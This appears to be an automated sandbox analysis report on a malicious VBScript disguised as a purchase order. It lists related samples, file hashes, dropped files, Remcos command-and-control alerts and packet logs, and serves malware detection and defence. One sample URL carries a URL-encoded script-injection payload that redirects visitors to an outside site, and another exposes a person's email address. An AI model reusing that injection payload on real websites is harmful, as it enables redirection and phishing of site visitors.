	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.16.12
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	172.67.216.244
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
FASTLYUS	Quotation#4873920.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	Quotation#4873920.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	GlobalProtect-6.3.1.pkg	Get hash	malicious	Unknown	Browse	151.101.67.6
	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://www.diamondsbyeden.com/	Get hash	malicious	Unknown	Browse	185.199.111.133
	https://globalairt.com/arull.php?7104797967704b536932307464507a53744a4c53704a7a4d77727273784c7a7453725374524c7a732f564c3477776474594841413d3dkkirkman@ssc.nsw.gov.au	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Globalfoundries.com_Report_46279.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	151.101.129.44
	Play_VM-NowCWhiteAudiowav012.html	Get hash	malicious	Tycoon2FA	Browse	151.101.2.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 188.114.96.3
	justificante de transferencia.vbs	Get hash	malicious	FormBook	Browse	185.199.108.133 188.114.96.3
	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	185.199.108.133 188.114.96.3
	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	185.199.108.133 188.114.96.3
	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	185.199.108.133 188.114.96.3
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 188.114.96.3
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.108.133 188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	185.199.108.133 188.114.96.3
	sostener.vbs	Get hash	malicious	Njrat	Browse	185.199.108.133 188.114.96.3
	sostener.vbs	Get hash	malicious	XWorm	Browse	185.199.108.133 188.114.96.3

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	6.768713629839428
Encrypted:	false
SSDEEP:	3:meYyjCVm+r26Iee9oLP0rl0njXywFrUIy5/eS2mIAbkhN:mefeyFei0P0qjiirUIyheS2vAbkhN
MD5:	81F1DE84B2080AB37A1CF3C91BEAAB63
SHA1:	6BEDDF7CAC331F871A9C7CF1F8F8357480BBE2E5
SHA-256:	1212006F583EAB919FFD6069271F6CE5F5C79EACC170811A87AE988DE2C7C2D5
SHA-512:	288C72ECF184DB1A2E1F3D6BDA04C945D0B2C6358FF256A576126EF9D12BB0DD76A377340393819589C218A51444AE19D977EBCB9C668098649A039DDE57BFBE
Malicious:	true
Reputation:	low
Preview:	. .5.rW.t...3.H.+.~...J.[N.]..Y...#.z...{...iL.&.u@.T...V$.,.=x....c.}...F..y^\|.@..U.i...Q.l.&......p:....Z{w.q..FG...)...-..,.F...w...*..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0hlav5g.lh0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lehcme0q.gxj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh0x5tnr.cak.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3hpztb5.1fc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqlgpeui.ral.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqp0qdea.nuh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.735653316338605
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Purchase Order - PO14895.vbs
File size:	498'390 bytes
MD5:	411a23153d97ad4c071a62d54e928d6b
SHA1:	f1fc194cf23bd614ed793037f6700c565e88b11b
SHA256:	cf85e5927fe85ba85cd070fcc7a6fdf206625e836a9194143f789d24ed1671ab
SHA512:	a245a3c469c760e11dc74a1f7ea0762da5dc2fc7e23d2688fc3270678c1f1b32964be276b1912a9d637557d4715d920ca8e0e79008264b355aa360025d235c59
SSDEEP:	12288:464azKbI45msgYvWtcg7qKsxNksRgTJct4AqHpE0pZvSmO9FuhFz3VGMIQbPxur5:FEaPqH1
TLSH:	3FB4E91135EA7008F1F32FA356F955E94F6BB9662A36912E7048074F4BA3E80CE51B73
File Content Preview:	..o.c.K.e.J.b.O.Q.J.i.O.e.i.k.K.L.i.b.c.O.W.L.z.L.c.L.A.g.l.J.G.a.k.q.L.W.i.i.W.x.L.K.W.n.p.b.q.z.i.G.o.m.U.Z.e.e.z.q.O.k.o.W.a.Q.i.i.f.U. .=. .".t.P.c.s.g.q.k.m.K.c.A.p.N.Z.p.u.W.L.b.N.x.v.z.G.n.Z.t.i.O.m.U.a.N.W.O.c.i.d.C.c.d.u.L.K.P.e.z.N.A.R.S.o.i.i.B

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:27:44.818707+0200	2841075	ETPRO MALWARE Terse Request to paste .ee - Possible Download	1	192.168.2.9	49708	188.114.96.3	443	TCP
2024-10-03T09:27:45.004942+0200	2020423	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1	1	188.114.96.3	443	192.168.2.9	49708	TCP
2024-10-03T09:27:45.004942+0200	2020425	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1	1	188.114.96.3	443	192.168.2.9	49708	TCP
2024-10-03T09:27:47.224179+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49709	45.133.172.96	55543	TCP
2024-10-03T09:27:49.835645+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49710	45.133.172.96	55543	TCP
2024-10-03T09:27:52.441621+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49711	45.133.172.96	55543	TCP
2024-10-03T09:27:55.051372+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49712	45.133.172.96	55543	TCP
2024-10-03T09:27:57.675496+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49713	45.133.172.96	55543	TCP
2024-10-03T09:28:00.285235+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49714	45.133.172.96	55543	TCP
2024-10-03T09:28:02.894400+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49715	45.133.172.96	55543	TCP
2024-10-03T09:28:05.505771+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49716	45.133.172.96	55543	TCP
2024-10-03T09:28:08.133667+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49717	45.133.172.96	55543	TCP
2024-10-03T09:28:10.775434+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49718	45.133.172.96	55543	TCP
2024-10-03T09:28:13.379220+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49719	45.133.172.96	55543	TCP
2024-10-03T09:28:15.987808+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49720	45.133.172.96	55543	TCP
2024-10-03T09:28:18.597745+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49721	45.133.172.96	55543	TCP
2024-10-03T09:28:21.208671+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49722	45.133.172.96	55543	TCP
2024-10-03T09:28:23.836375+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49724	45.133.172.96	55543	TCP
2024-10-03T09:28:26.462659+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49725	45.133.172.96	55543	TCP
2024-10-03T09:28:29.087431+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49726	45.133.172.96	55543	TCP
2024-10-03T09:28:31.709917+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49727	45.133.172.96	55543	TCP
2024-10-03T09:28:34.348933+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49728	45.133.172.96	55543	TCP
2024-10-03T09:28:36.989459+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49729	45.133.172.96	55543	TCP
2024-10-03T09:28:39.604380+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49730	45.133.172.96	55543	TCP
2024-10-03T09:28:42.244367+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49731	45.133.172.96	55543	TCP
2024-10-03T09:28:44.866921+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49732	45.133.172.96	55543	TCP
2024-10-03T09:28:47.510921+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49733	45.133.172.96	55543	TCP
2024-10-03T09:28:50.166659+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49734	45.133.172.96	55543	TCP
2024-10-03T09:28:52.790440+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49735	45.133.172.96	55543	TCP
2024-10-03T09:28:55.395364+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49736	45.133.172.96	55543	TCP
2024-10-03T09:28:58.004779+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49737	45.133.172.96	55543	TCP
2024-10-03T09:29:00.618113+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49738	45.133.172.96	55543	TCP
2024-10-03T09:29:03.227736+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49739	45.133.172.96	55543	TCP
2024-10-03T09:29:05.852942+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49740	45.133.172.96	55543	TCP
2024-10-03T09:29:08.460260+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49741	45.133.172.96	55543	TCP
2024-10-03T09:29:11.068137+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49742	45.133.172.96	55543	TCP
2024-10-03T09:29:13.645988+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49743	45.133.172.96	55543	TCP
2024-10-03T09:29:16.194856+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49744	45.133.172.96	55543	TCP
2024-10-03T09:29:19.072157+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49745	45.133.172.96	55543	TCP
2024-10-03T09:29:21.554422+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49746	45.133.172.96	55543	TCP
2024-10-03T09:29:24.005394+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49747	45.133.172.96	55543	TCP
2024-10-03T09:29:26.521436+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49748	45.133.172.96	55543	TCP
2024-10-03T09:29:28.931502+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49749	45.133.172.96	55543	TCP
2024-10-03T09:29:31.306258+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49750	45.133.172.96	55543	TCP
2024-10-03T09:29:33.665716+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49751	45.133.172.96	55543	TCP
2024-10-03T09:29:35.990740+0200	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.9	49752	45.133.172.96	55543	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:27:40.816129923 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:40.816180944 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:40.816271067 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:40.825352907 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:40.825387001 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.305335045 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.305538893 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.309988976 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.310003996 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.310343027 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.321480036 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.363415003 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.590779066 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.590982914 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.591010094 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.591037035 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.591041088 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.591077089 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.591095924 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.598826885 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.598856926 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.598880053 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.598885059 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.598912954 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.598931074 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.598948956 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.598973036 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.599015951 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.599023104 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.599069118 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.606914043 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.650990963 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.682085991 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682133913 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682159901 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682183027 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682209015 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682212114 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.682245970 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682261944 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.682301044 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.682845116 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682902098 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682925940 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682940960 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.682952881 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.682991028 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.683727980 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.683768988 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.683814049 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.683826923 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.689857006 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.689881086 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.689904928 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.689922094 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.689949036 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.689986944 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.690234900 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.690256119 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.690280914 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.690289974 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.690314054 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.690370083 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.690376043 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.690439939 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.691018105 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.748501062 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.748528957 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773045063 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773057938 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773094893 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773117065 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773124933 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773133039 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.773152113 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773173094 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.773180008 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.773201942 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.775357962 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.775417089 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.775430918 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.775439978 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.775448084 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.775460005 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.775464058 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.775475979 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.775496960 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.780936003 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.780965090 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.781002998 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.781019926 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.781055927 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.822856903 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.832850933 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.832860947 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.832901001 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.832928896 CEST	49706	443	192.168.2.9	185.199.108.133
Oct 3, 2024 09:27:41.832943916 CEST	443	49706	185.199.108.133	192.168.2.9
Oct 3, 2024 09:27:41.832983017 CEST	49706	443	192.168.2.9	185.199.108.133
